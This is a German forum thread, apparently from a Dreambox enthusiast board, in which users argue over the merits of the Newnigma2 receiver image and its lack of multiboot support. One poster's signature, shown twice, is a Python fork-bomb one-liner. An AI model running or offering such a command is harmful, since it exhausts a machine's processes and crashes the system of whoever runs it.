warum Bestes Image

• + Bildqualität einstellbar (bietet mehr als mein Plasma TV) ;)
      + Pip Managment super schnell gelöst. Stop Taste -> Pip (PipZap) oder 2x kurz Blau für an/aus und 0 Taste kann man frei wählen (Ich tausche die Screens). Bei anderen Images muss man sich durch die Menüs quälen oder irgendwelche Tasten lang drücken... umständlich ohne Ende.
      + PiP Fenster- Position & Größe einstellbar (fehlt bei den anderen Images)
      + Viele Plugins und die installierten Plugins werden "grün" markiert. Finde ich toll
      + Software Update ohne neu Flashen zu müssen
      + sehr Stabil !!! ++++

- kein Support für Meoboot, deswegen benutze ich BarryAlen.

Ich habe MediaPlayer durch MediaCenter ersetzt weil ich MediaCenter besser finde.
      Als Skin benutze ich "dmconcinnity-hd_mod". In Combi mit Newnigma2 macht Dream 8000 so richtig Spass.

Ich habe auch Pater Pan 2.0 auf dem Stick, sieht schick aus aber ist für mich nicht alltagstauglich speziell weil die PiP Benutzung total umständlch ist und es fehlen noch einige Sachen was in Newnigma2 schon längst vorhanden ist.

Daher gibt es für mich derzeit nichts besseres als Newnigma2. :)

Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von Gaspedal ()

• +++++ access to test version(unstabile) = fresh image all the time(yes, during tree years few times had to reflash box from zero, but that is OK)
      +++ god responce from developers, especialy for german users, english could be better
      ++++ some plugins like autoresolution and others were publicated there first

-- too much time is spent on picons and skins etc insted improve functiomality

@madmic
      parts which are opensource(has *.py files) can be patchet by self made scripts
      E2 Python patcher
      dm7080sstt; 2x dm8000sstt; dm7020s <- Diseq1x4 <- 3x Diseq1x10 <-
      Dishes:
      1.8m 36E;28E;23E;19E;16E;13E;7E
      1.6m 42E;36E
      1.0m 10/9E;5E;1W;8W
      1.0m 15W;22W;30W
      1.1m 4/5W;12W;18W;24W
      1.1m 53E;60E
      1.0m 75E
      TVs: Philips 46pfl9707s; Philips 42pfl9703h
    • Original von kati910
      - kein Support für Meoboot, deswegen benutze ich BarryAlen. <- Das nicht dein ernst?

das supporten wir ja auch nicht :D
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Morgen frag ich bei Mercedes-Benz und frage dort warum die Daimler die besten sind.
      Sorry aber wer in einem Heimatboard (egal welches) fragt warum das eigene Image das beste ist erwartet doch nicht wirklich ne objektive und unparteische Antwort oder?
      Oh Herr....
      O.T.P.V.D.H
    • Original von nixkoenner
      Original von kati910
      - kein Support für Meoboot, deswegen benutze ich BarryAlen. <- Das nicht dein ernst?

das supporten wir ja auch nicht :D

Meoboot läuft überhaupt nicht, wenigstens läuft BarryAllen. Sollte dies auch nicht laufen müsste ich NewNigma aus Flash wieder löschen da Multiboot bei mir ne Killer Feature ist. ;)
    • Ich erwarte nur das ma respektiert das wir kein support oder unterstützung für multiboot systeme machen egal ob Meoboot oder BA.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Ich erwarte nur das ma respektiert das wir kein support oder unterstützung für multiboot systeme machen egal ob Meoboot oder BA.

Man sollte auch respektieren und verstehen dass man ein Dreambox 8000 auch dazu hat verschiedene Images auszuprobieren und gerne mal experementiert ohne jedes mal alles in den Flash Speicher zu flashen. Sonst könnte ich mir gleich ne Humax holen :D

Das man hier keine Antworten auf Multiboot Fragen bekommt kann ich verstehen & respektieren, aber wenn ein Image uns daran hindert, Multiboot einzurichten, dann ist es nicht mehr Lustig. Oder was würdet Ihr machen wenn DMM Harwaretechnisch es unmöglich machen würde andere Images zu flashen ? ;)
      Würdet Ihr das respektieren oder würdet Ihr versuchen es trotzdem zu "hacken" ?
      Denkt mal darüber nach...

Dieser Beitrag wurde bereits 6 mal editiert, zuletzt von Gaspedal ()

• Original von JERKBALL
      Original von kati910
      Ich erwarte nur das ma respektiert das wir kein support oder unterstützung für multiboot systeme machen egal ob Meoboot oder BA.

Vergiss es.. die Leute wollen spielen und nicht fernsehen ;)

Nur zum Fernsehen braucht man auch kein Dreambox 8000. ;)

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Gaspedal ()

• Original von Gaspedal
      Original von kati910

Man sollte auch respektieren und verstehen dass man ein Dreambox 8000 auch dazu hat verschiedene Images auszuprobieren und gerne mal experementiert ohne jedes mal alles in den Flash Speicher zu flashen. Sonst könnte ich mir gleich ne Humax holen :D

Das man hier keine Antworten auf Multiboot Fragen bekommt kann ich verstehen & respektieren, aber wenn ein Image uns daran hindert, Multiboot einzurichten, dann ist es nicht mehr Lustig. Oder was würdet Ihr machen wenn DMM Harwaretechnisch es unmöglich machen würde andere Images zu flashen ? ;)
      Würdet Ihr das respektieren oder würdet Ihr versuchen es trotzdem zu "hacken" ?
      Denkt mal darüber nach...

nun ja das problem ist nun mal wir haben einen eigenen kernel und module und die passen nicht mit
      anderen images zusammen da jeder etwas eigenes am kernel strikt von daher supporten wir das nicht
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • Original von Gaspedal

- kein Support für Meoboot, deswegen benutze ich BarryAlen.

Es gibt keinen Support fuer irgendein Multiboot! Also auch und ganz besonders nicht fuer BA! Das kannst Du respektieren oder es sein lassen. Wenn es aktuell fuer Dich funktioniert, schoen. Wenn es auf einmal nicht mehr geht, dann hast Du Pech, es wird Dir hier niemand helfen.
      Btw. Ich habe auf meiner 800er, auf meinen 2* 500HD und auf meinen 2* 8000ern kein Multibootzeigs drauf und nur NN² im Flash.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • ihr wiederholt euch alle, das wisst ihr schon? ich glaub er kann lesen. er hat doch auch kein support verlangt? man ihr schreibt wieder zig sachen die nicht zum thema gehoeren. steht doch im jeden release drinne, muesst ihr hier nicht noch 1000 mal schreiben, vorallem jeder den selben schmarrn.

gaspedal hat recht. eine 8000er mag fuers REINE tv schauen ueberdimensioniert sein, aber die box hat mehr vorteile

- dvd laufwerk intern
      - mehr tuner (fuer kabel/sat)
      - festplatte passt auch rein
      - groesseres oled
      - leistung ist spitze
      - kann xvid, mkv container in 1080p (mit dts) wiedergeben
      - ..

das dazu.

bestes image.mh. niemand macht fuer sich selber werbung. user entscheiden. user sollten ihre meinug preis geben. das waer ja so als wenn die tvhersteller die tvgeraete der anderen testen und die noten vergeben.
    • Oh mann ihr verbeißt euch zu sehr in das Thema BA.Es wird ja hoffentlich schon jeder User mitbekommen haben,das es hier keinen Support dafür gibt.Ist auch gut so,sonst hättet ihr hier auch ellenlange Threads,wie in einem anderen Board mit den Themen BA geht nicht,meine festplatte wurde gelöscht usw.
      Das NewNigma Image ist eines der Besten.Schnelle Umschaltzeiten.Eine klare und einfache Menüführung.Viele Plugins.(ob supportet oder nicht :D)
      Das Mittesten der neuesten Unsteable finde ich, ist das beste Feature.Man ist immer auf den neuesten Stand.
      Klasse Arbeit vom Team.Nur weiter so!!

lg
      loui
    • Solange so etwas

> - kein Support für Meoboot, deswegen benutze ich BarryAlen.

von Usern hier verbreitet wird haben es ja scheinbar doch nicht alle verstanden, sonst wuerde es nicht geschrieben.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Oh man, kommt mal alle wieder runter! (außer nixkoenner & oZxS) Da kommen Leute wie kati910 her mit'ne 800'er Dreambox und schreiben "ich brauch kein Multiboot". Und ? Mit so'ne 800'er Mini-Spielzeugkiste würde ich sowas auch nicht haben wollen. Die Rede ist von Dreambox 8000 !!

Wer verlangt denn hier Support ? Wo habe ich das geschrieben ? Mit kein Support habe ich die "Software-Sperre" der NewNigma2 als Nachteil erwähnt. MEHR NICHT !!

Selbst DMM erlaubt fremde Images zu installieren, bietet kein Support (was ich OK finde) aber die bauen nicht irgendwelche Sperren ein um dies zu verhindern, denn sonst würdet Ihr auch nur rumjammern und würdet alles tun um diese Sperre zu umgehen. Benutzung auf eigene Gefahr und so sollte es immer sein !!

Daher, erst lesen, dann Antworten... :]

Dieser Beitrag wurde bereits 7 mal editiert, zuletzt von Gaspedal ()

• Original von Gaspedal
      Oh man, kommt mal alle wieder runter! (außer nixkoenner & oZxS) Da kommen Leute wie kati910 her mit'ne 800'er Dreambox und schreiben "ich brauch kein Multiboot". Und ? Mit so'ne 800'er Mini-Spielzeugkiste würde ich sowas auch nicht haben wollen. Die Rede ist von Dreambox 8000 !!

Wer verlangt denn hier Support ? Wo habe ich das geschrieben ? Mit kein Support habe ich die "Software-Sperre" der NewNigma2 als Nachteil erwähnt. MEHR NICHT !!

Selbst DMM erlaubt fremde Images zu installieren, bietet kein Support (was ich OK finde) aber die bauen nicht irgendwelche Sperren ein um dies zu verhindern, denn sonst würdet Ihr auch nur rumjammern und würdet alles tun um diese Sperre zu umgehen. Benutzung auf eigene Gefahr und so sollte es immer sein !!

Daher, erst lesen, dann Antworten... :]

Wer sagt dir das ich keine 8k habe?
      Und ausserdem wen du richtig lesen würdest erkennst du vielleicht das ich nur erwähnt habe das wir keinen support für Multiboot sachen machen nicht mehr und nicht weniger was du letzt endlich auf deiner box machst ist doch allein deine angelegenheit.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von Gaspedal

Dann kläre uns mal auf was eine "Software-Sperre" sein soll und wo die in unserem Image ist .
      Kann alles , weiß alles und mache alles :pleased2: